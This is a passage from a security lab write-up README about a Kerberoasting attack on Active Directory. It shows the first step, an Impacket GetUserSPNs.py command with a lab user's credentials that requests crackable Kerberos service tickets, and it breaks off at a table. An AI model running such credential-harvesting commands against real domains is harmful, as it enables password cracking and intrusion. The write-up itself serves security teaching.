ShahinSecLab/Write-Ups/writeups/kerbersoting attack/README.md

 ## Step 1 – Find Service Accounts

+First step was to enumerate service accounts that have SPNs registered in Active Directory.
+For this, I used Impacket’s `GetUserSPNs.py` tool.

 ```bash
 GetUserSPNs.py readteambd.local/rahimkhan:Password1 -dc-ip 192.168.5.134 -request
 ```
+This command lists all service accounts and automatically requests Kerberos service tickets in a crackable format.

 ```
 | Part                  |                     Description                      |